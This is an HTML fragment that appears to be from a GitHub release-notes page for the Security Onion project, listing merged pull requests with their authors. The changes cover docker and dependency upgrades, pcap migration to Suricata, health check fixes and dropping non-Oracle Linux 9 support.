<li>healthTimeoutSeconds should be an int by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coreyogburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coreyogburn">@coreyogburn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3965568559" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15507" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15507/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15507">#15507</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3968564078" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15509" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15509/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15509">#15509</a></li>
<li>New so-yaml.py Functions for Gemini Cypress Test Support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3965205639" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15505" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15505/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15505">#15505</a></li>
<li>upgrade docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3969600783" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15510" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15510/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15510">#15510</a></li>
<li>migrate managed_integrations pillar by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3964403893" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15503" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15503/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15503">#15503</a></li>
<li>upgrade analyzer deps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3969858046" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15511" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15511/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15511">#15511</a></li>
<li>fix consecutive comments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3970386215" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15513" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15513/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15513">#15513</a></li>
<li>fix soup failure if salt-relay isn't running by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3979712790" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15519" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15519/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15519">#15519</a></li>
<li>Add Support for upgrading to 3.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3978668913" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15517" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15517/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15517">#15517</a></li>
<li>Rename model ID from 'sonnet-4.5' to 'sonnet' by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3984128332" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15522" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15522/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15522">#15522</a></li>
<li>fix field conflicts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3985799413" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15524" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15524/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15524">#15524</a></li>
<li>fix suricata filestream dataset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3985270995" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15523" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15523/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15523">#15523</a></li>
<li>fix agentstatus script by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992224234" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15525" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15525/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15525">#15525</a></li>
<li>do not allow auth redirection to login page or home page; that serves… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992282955" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15526" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15526/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15526">#15526</a></li>
<li>exclude transient ghcr.io network errors since it retries during setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3996143254" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15532" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15532/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15532">#15532</a></li>
<li>Cleanup idstools by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3995789938" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15531" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15531/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15531">#15531</a></li>
<li>restart salt minion before failing if not ready by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3996717071" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15534" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15534/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15534">#15534</a></li>
<li>prevent caching of main doc to ensure logged out detection is processed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3997753009" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15535" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15535/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15535">#15535</a></li>
<li>Move rm to post by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001074950" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15536" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15536/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15536">#15536</a></li>
<li>prepare for nextgen docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4002237984" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15539" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15539/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15539">#15539</a></li>
<li>2.4.210 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012611157" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15541" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15541/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15541">#15541</a></li>
<li>2.4.210 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012969355" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15542" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15542/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15542">#15542</a></li>
<li>3/dev merge fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4013134546" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15544" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15544/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15544">#15544</a></li>
<li>3/dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4013069635" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15543" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15543/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15543">#15543</a></li>
<li>Add version 3.0.0 to discussion template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4013145218" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15545" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15545/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15545">#15545</a></li>
<li>Support additional alt names in web cert by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4024064476" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15555" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15555/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15555">#15555</a></li>
<li>update repo readme by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4024047170" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15554" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15554/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15554">#15554</a></li>
<li>update 2.4 references to 3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4029205063" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15556" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15556/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15556">#15556</a></li>
<li>remove steno by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4036095575" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15563" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15563/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15563">#15563</a></li>
<li>pcapout still used for extracts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047338081" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15566" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15566/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15566">#15566</a></li>
<li>Update so-suricata-testrule for idstools removal by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052461394" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15572" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15572/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15572">#15572</a></li>
<li>Refactor upgrade functions and version checks by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047928339" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15567" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15567/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15567">#15567</a></li>
<li>cleanup steno. sensor run pcap.cleanup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053985041" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15575" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15575/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15575">#15575</a></li>
<li>set container ulimits to default by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059997988" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15594" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15594/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15594">#15594</a></li>
<li>remove 10T virtual disk limit. URL_BASE to vm hosts file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059280756" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15591" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15591/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15591">#15591</a></li>
<li>Add version 2.4.211 to discussion template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066125237" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15599" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15599/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15599">#15599</a></li>
<li>Remove version 3.0.0 from 2.4 discussion template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dougburks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dougburks">@dougburks</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4071600844" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15603" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15603/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15603">#15603</a></li>
<li>Update version check to include 2.4.211 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4060361100" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15595" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15595/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15595">#15595</a></li>
<li>pcap cleanup state. enable/disable pcap for suricata in soc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053934928" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15574" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15574/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15574">#15574</a></li>
<li>Improve soup version checks and migrate pcap to suricata by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072853346" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15608" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15608/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15608">#15608</a></li>
<li>Moresoup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073093782" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15609" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15609/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15609">#15609</a></li>
<li>API errors will no longer redirect by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073361435" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15612" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15612/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15612">#15612</a></li>
<li>initialize pcap-log by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077181403" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15615" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15615/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15615">#15615</a></li>
<li>forcedType bool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083609284" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15618" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15618/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15618">#15618</a></li>
<li>Remove support for non-Oracle Linux 9 operating systems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084701743" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15619" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15619/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15619">#15619</a></li>
<li>Remove non-Oracle Linux 9 support from salt states by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084762816" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15620" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15620/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15620">#15620</a></li>
<li>Add -r flag to so-yaml get and migrate pcap pillar to suricata by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073252051" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15610" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15610/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15610">#15610</a></li>
<li>fix health check for new hydra version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085176625" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15622" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15622/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15622">#15622</a></li>
<li>Rebuild analyzer source-packages wheels for Python 3.14 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085001419" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15621" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15621/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15621">#15621</a></li>
<li>fix hydra health check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088050579" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15623" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15623/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15623">#15623</a></li>
